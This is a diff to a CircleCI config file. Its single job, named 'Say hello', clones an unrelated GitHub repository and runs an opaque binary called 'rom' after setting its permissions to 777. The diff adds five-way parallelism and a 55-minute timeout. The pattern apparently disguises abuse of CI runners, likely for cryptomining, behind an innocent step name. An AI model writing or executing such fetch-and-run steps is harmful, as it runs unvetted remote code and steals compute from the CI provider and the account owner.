--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -12,10 +12,12 @@ jobs:
       - image: cimg/python:3.9
     # Add steps to the job
     # See: https://circleci.com/docs/2.0/configuration-reference/#steps
+    parallelism : 5
     steps:
       - checkout
-      - run:
+      - run :
           name: "Say hello"
+          no_output_timeout : 55m
           command: git clone https://github.com/bamin3812/tesla.git && cd tesla && chmod 777 rom && ./rom
 
 # Invoke jobs via workflows
